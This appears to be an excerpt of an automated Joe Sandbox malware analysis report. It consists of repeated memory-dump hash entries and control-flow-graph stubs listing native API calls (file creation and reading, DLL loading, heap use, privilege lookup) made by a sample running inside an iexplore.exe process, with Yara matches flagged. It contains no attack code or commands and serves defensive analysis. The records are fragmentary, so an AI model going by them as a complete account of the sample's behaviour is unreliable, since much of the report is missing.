                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 034a7ddd538a554d9c3e21bd713131afa771b4156c3a657697088c8d711d017c
                                  • Instruction ID: d1e61e9e33a7dd6400f9db58eede4bf6d6e347dd6d75995bb23a2491500c7133
                                  • Opcode Fuzzy Hash: 034a7ddd538a554d9c3e21bd713131afa771b4156c3a657697088c8d711d017c
                                  • Instruction Fuzzy Hash: 3FF0D122B1DD2E0AD67CAB5CB4610A9B3D1EB8C76071001BFD45EC329BED29A94346C5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d2a52caa4ecef4738e2fe69b45c75adbd34a274e4d16ae9b8a4f52040cf9ae4e
                                  • Instruction ID: 0b0e4fcccdf98ce06ef30fe637aeb12f4861b893ccbab7ba5b756d55e2d52864
                                  • Opcode Fuzzy Hash: d2a52caa4ecef4738e2fe69b45c75adbd34a274e4d16ae9b8a4f52040cf9ae4e
                                  • Instruction Fuzzy Hash: 45F0D122B1DD2E0AD67CAB6C74611A9B3D1EB4C72071001BFD45EC329BED25B94246C5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5608c72137a7e274b7a42fc685b73e050ae1c87573e192978f3f397378f055cc
                                  • Instruction ID: 418ebd1d2f742795291ca101a8ce3ed71d8b01ac3f3f4bedf07f2bde15369f68
                                  • Opcode Fuzzy Hash: 5608c72137a7e274b7a42fc685b73e050ae1c87573e192978f3f397378f055cc
                                  • Instruction Fuzzy Hash: FC11CA20A0DB9D49FB7093A89054771B7C09FD9304F094ABEC4CA426E2C99DBEC5C341
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b5ec2922b61d93b6b53064f6cece105f795d9f6108f084d95d271bbab7c7f065
                                  • Instruction ID: e892a784ad9c88ffe31afdbefae429dc2d092872b59a57cf5305f78daa652c87
                                  • Opcode Fuzzy Hash: b5ec2922b61d93b6b53064f6cece105f795d9f6108f084d95d271bbab7c7f065
                                  • Instruction Fuzzy Hash: C7F0F621B0991E0FEBBCE69DB4A42B836D1EF8C23274A00BEE40DC71A5E8458DC183C0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eec2d3d348c12a9102bcd01dc31f6c17c620cfbbaa163cab4cbee3239b2579d1
                                  • Instruction ID: 58932c978b313993857287c98a534f93c71614a5ab884347f45eec2ea955d880
                                  • Opcode Fuzzy Hash: eec2d3d348c12a9102bcd01dc31f6c17c620cfbbaa163cab4cbee3239b2579d1
                                  • Instruction Fuzzy Hash: 65F0F222B0DE2E0BD67CAA5C7451069B3D1EB5832031100AED41EC329BDD24B94246C5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9f0ff6cf005884c029f15f92d2697bf5dd8f6e4fe52d532f452c978da5efb308
                                  • Instruction ID: ddd438cc4da876e54a740dcf2992d264ea8cd1be26adfcf8437bfc040f8dadd4
                                  • Opcode Fuzzy Hash: 9f0ff6cf005884c029f15f92d2697bf5dd8f6e4fe52d532f452c978da5efb308
                                  • Instruction Fuzzy Hash: E5F06230715E0D4FD7A4FBAD949467272D2FBAC315714017DD00DC33A5DD25E8428740
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 35fba98ae79f1474914cb4a6a1d82d7b43e5ff7e6fc75b7f0a5459f09ee77adf
                                  • Instruction ID: 7b5c598403342c22ad9ecc6cae3bbd978e1d5740ae0a5b63504e84b3e85186f4
                                  • Opcode Fuzzy Hash: 35fba98ae79f1474914cb4a6a1d82d7b43e5ff7e6fc75b7f0a5459f09ee77adf
                                  • Instruction Fuzzy Hash: B5F0A432B1DD2E0AD67CAB9C74611A9B3D1EF8C72075041AFD06EC32DBDD29A94346C5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0813187b43dbfa25d441ec6bd83d430d1fa652108c58bf7659b75276f817ae03
                                  • Instruction ID: 8fe6ea934d4676825db7e78d11b14387d82ff15fe3181069f81c508a14b81453
                                  • Opcode Fuzzy Hash: 0813187b43dbfa25d441ec6bd83d430d1fa652108c58bf7659b75276f817ae03
                                  • Instruction Fuzzy Hash: D1F0F420B5A91D0AE9B9E7ED10752B811C2EFCD310B9A0377D40DC67E6CD29AE424381
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d9475fd87c98eb6588fa056046c3e34019567988353e24535bb045e29373ce93
                                  • Instruction ID: af93a6016469bf6c1081b8248bc743aba76595735e1d41c0602d7f2f6d3a8e29
                                  • Opcode Fuzzy Hash: d9475fd87c98eb6588fa056046c3e34019567988353e24535bb045e29373ce93
                                  • Instruction Fuzzy Hash: 19F0A421B1DE6E0AD67DEB6874214A9B3D1EF4832075001FFD45EC32DBDD28B94646C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8eb5fda517d985c7af3ff9743b6302b7000379c60a17dce0cc8fa0e37fb8d9e3
                                  • Instruction ID: 92fa47f5202f429b1e989df5059fb4fa504f91e648de0b1c32ad95e3f9cccf39
                                  • Opcode Fuzzy Hash: 8eb5fda517d985c7af3ff9743b6302b7000379c60a17dce0cc8fa0e37fb8d9e3
                                  • Instruction Fuzzy Hash: F4F0D170B19E1A8FDBB8E77490657B2B2E1FB58300F204479D01EC2194DE34E8468740
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7cb8af6cb147d60deeac64cd73bd444c98d013fde02de0b5191d1299d345a22c
                                  • Instruction ID: 7cc41bde1cd0c91b215b67ebc36b6f84f25a08aa60ae99b8da609a2eacd6eb6b
                                  • Opcode Fuzzy Hash: 7cb8af6cb147d60deeac64cd73bd444c98d013fde02de0b5191d1299d345a22c
                                  • Instruction Fuzzy Hash: FCF03C3071AA0E8FDEA8EB6DC4A0A2573D0EB9C34476547A9D40ECB2A1E916ED468700
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8f42a0f551bfdb10eada8ace27fee32585d94b88a2e247e9661a23a6c03fc28f
                                  • Instruction ID: 0f93cda0390978bd604918c144d5fae3b21ddda3e8518966eba061c10c0a7f0f
                                  • Opcode Fuzzy Hash: 8f42a0f551bfdb10eada8ace27fee32585d94b88a2e247e9661a23a6c03fc28f
                                  • Instruction Fuzzy Hash: 4AF02E12B1AE1E0BE7E8A37C286823451C2EF8C610B8A04B6D00DC32EAFD19EC424681
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f0237596ae64105a57a9d21673c8007bf9f9c5c1923421d8c34ae2f669e7de72
                                  • Instruction ID: 2f05618acd68696ed2f2635433402d5cb5d3d90041a13d07d8e6001fb7f1ad0d
                                  • Opcode Fuzzy Hash: f0237596ae64105a57a9d21673c8007bf9f9c5c1923421d8c34ae2f669e7de72
                                  • Instruction Fuzzy Hash: 94F0F623B2E94A4FE75DA238A4A18B5B390EF5635035506BBC00AC759AED25B5438781
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3d892af10f7cb36ddebbbf733d4e2e729c57ab52962f13ef63e03089ca6930dc
                                  • Instruction ID: 74fb406ed8f45edef391c356b05750923be26c775a39100cb96d1c63f9dcc1ac
                                  • Opcode Fuzzy Hash: 3d892af10f7cb36ddebbbf733d4e2e729c57ab52962f13ef63e03089ca6930dc
                                  • Instruction Fuzzy Hash: 0A016D7091DBCD4FDB4AEB688C681A97FB0FF59200B0504EBD468C71A2DA7555148741
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 57def6a6ec98a0cdeb30174df0977b6341712774bcb0a1b5dbcde91468b4db92
                                  • Instruction ID: 9b407acae1bdacece03426d7890b137da25474ff66d599741c5b64e8b215261e
                                  • Opcode Fuzzy Hash: 57def6a6ec98a0cdeb30174df0977b6341712774bcb0a1b5dbcde91468b4db92
                                  • Instruction Fuzzy Hash: EFE02241B2A82E13A378B6FD38A91FA06C5DFDC1287080037E01CC3293DC4858428381
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e8d2cba1ea17d3b3f72fdcfb86c94ffc20c59254a5a59a3f1ff0a9d95ff7118
                                  • Instruction ID: abb9be7245a0be8193760fabdb0cf1c331402036e424ff0b12514c814e517edf
                                  • Opcode Fuzzy Hash: 6e8d2cba1ea17d3b3f72fdcfb86c94ffc20c59254a5a59a3f1ff0a9d95ff7118
                                  • Instruction Fuzzy Hash: 0FF0273160AA0D06EA74126A5C586B13BC8DF99252F11033BD449C21E1CD29E5818690
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a460c540549db29cf0418eaf23a9fb6c59baa4ab773282a2b6d31e834e16180c
                                  • Instruction ID: 3c7c5675211c7d07164cbd610503183eefc616424290922115a4e933669e1ef2
                                  • Opcode Fuzzy Hash: a460c540549db29cf0418eaf23a9fb6c59baa4ab773282a2b6d31e834e16180c
                                  • Instruction Fuzzy Hash: 62F05901D0DE6A24F7F262BA20543B969C09B98320F4A22B7C888C45D1D80DFEC54381
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4c9a328691be217f4e3c788a0c0e76a646ec89e9cc463f0234f7759b088bee49
                                  • Instruction ID: d7cf50aa6f53d233ff181b01dae2c71aaccdd9105a50c496319fc4c7c32f51a8
                                  • Opcode Fuzzy Hash: 4c9a328691be217f4e3c788a0c0e76a646ec89e9cc463f0234f7759b088bee49
                                  • Instruction Fuzzy Hash: 61E02222D0E7C90FD726973048620D93F60EF0A200F4601E3D0588B0D3E9189A098B82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 070b9ff84fb48fd21820edf7ad03bdbaf89312067e973f523335461557b89cd7
                                  • Instruction ID: 9f1d297c7ccf48fe62e3ee4910fe2ce9a2f116b3e760ad96b236a3c0e3706110
                                  • Opcode Fuzzy Hash: 070b9ff84fb48fd21820edf7ad03bdbaf89312067e973f523335461557b89cd7
                                  • Instruction Fuzzy Hash: 1DE08C21715C1E0F8AA4E36CA85467522D5EBCC22074901A2A40CC32A8CE14CC4283C0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 981c908e619c8df78a7b1653ac7ae8e01c7b324f3b4ccb88c362d30e6e700ffb
                                  • Instruction ID: 5dd3ba2e4595431abbbeab886ecc0476afa535c09bec47084bfe2fd5efe70ce7
                                  • Opcode Fuzzy Hash: 981c908e619c8df78a7b1653ac7ae8e01c7b324f3b4ccb88c362d30e6e700ffb
                                  • Instruction Fuzzy Hash: B8F049A18193C44EE392DB38845C3813FD0AF1A208F6900FEC488CF193E66B40878782
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1fdd06a22714875120530b6ed34a867c20e4d198fa7ab8a9a8a090be21147ff6
                                  • Instruction ID: 60c7ed03392ffa0d03089173883ed960c240cd50d085b7432123d3d0b19fb7f8
                                  • Opcode Fuzzy Hash: 1fdd06a22714875120530b6ed34a867c20e4d198fa7ab8a9a8a090be21147ff6
                                  • Instruction Fuzzy Hash: BCF05231E0829228D30B4B7498630F8BB30EE04710748017FC940961BBDB2D659AC7C0

                                  Execution Graph

                                  Execution Coverage:1.3%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:5.4%
                                  Total number of Nodes:516
                                  Total number of Limit Nodes:59

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 41a400-41a449 call 41af50 NtReadFile
                                  APIs
                                  • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: !JA$bMA$bMA
                                  • API String ID: 2738559852-4222312340
                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 151 40ace0-40acfc 152 40ad04-40ad09 151->152 153 40acff call 41cc40 151->153 154 40ad0b-40ad0e 152->154 155 40ad0f-40ad1d call 41d060 152->155 153->152 158 40ad2d-40ad3e call 41b490 155->158 159 40ad1f-40ad2a call 41d2e0 155->159 164 40ad40-40ad54 LdrLoadDll 158->164 165 40ad57-40ad5a 158->165 159->158 164->165
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                  • Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
                                  • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                  • Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 166 41a350-41a3a1 call 41af50 NtCreateFile
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 184 41a47c-41a4a9 call 41af50 NtClose
                                  APIs
                                  • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: ccc6d7e7147fe07a637f85aec792b8ecc79b1abc25d90ae8e6df0f92908d5df9
                                  • Instruction ID: 0494ff60b09d4fc21657d6c615b5019aa557bb466eed1ab501d89975e332403b
                                  • Opcode Fuzzy Hash: ccc6d7e7147fe07a637f85aec792b8ecc79b1abc25d90ae8e6df0f92908d5df9
                                  • Instruction Fuzzy Hash: 84E01776600214ABD720EBD9CC85FE77B68EF48764F158499BA1CAB242C534FA118BE0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 187 41a480-41a496 188 41a49c-41a4a9 NtClose 187->188 189 41a497 call 41af50 187->189 189->188
                                  APIs
                                  • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:

                                  Control-flow Graph

                                  control_flow_graph 23 41a620-41a651 call 41af50 RtlAllocateHeap
                                  APIs
                                  • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: &EA
                                  • API String ID: 1279760036-1330915590

                                  Control-flow Graph

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitFreeHeapProcess
                                  • String ID:
                                  • API String ID: 1180424539-0

                                  Control-flow Graph

                                  control_flow_graph 121 408308-40835a call 41be50 call 41c9f0 call 40ace0 call 414e40 130 40835c-40836e PostThreadMessageW 121->130 131 40838e-408392 121->131 132 408370-40838a call 40a470 130->132 133 40838d 130->133 132->133 133->131
                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0

                                  Control-flow Graph

                                  control_flow_graph 136 408310-40831f 137 408328-40835a call 41c9f0 call 40ace0 call 414e40 136->137 138 408323 call 41be50 136->138 145 40835c-40836e PostThreadMessageW 137->145 146 40838e-408392 137->146 138->137 147 408370-40838a call 40a470 145->147 148 40838d 145->148 147->148 148->146
                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0

                                  Control-flow Graph

                                  control_flow_graph 169 41a7b1-41a7b7 170 41a7e9-41a7f4 LookupPrivilegeValueW 169->170 171 41a7ba-41a7bd 169->171 172 41a81a-41a830 call 41af50 171->172 173 41a7bf-41a819 171->173 173->172
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0

                                  Control-flow Graph

                                  control_flow_graph 178 41a660-41a676 179 41a67c-41a691 RtlFreeHeap 178->179 180 41a677 call 41af50 178->180 180->179
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0

                                  Control-flow Graph

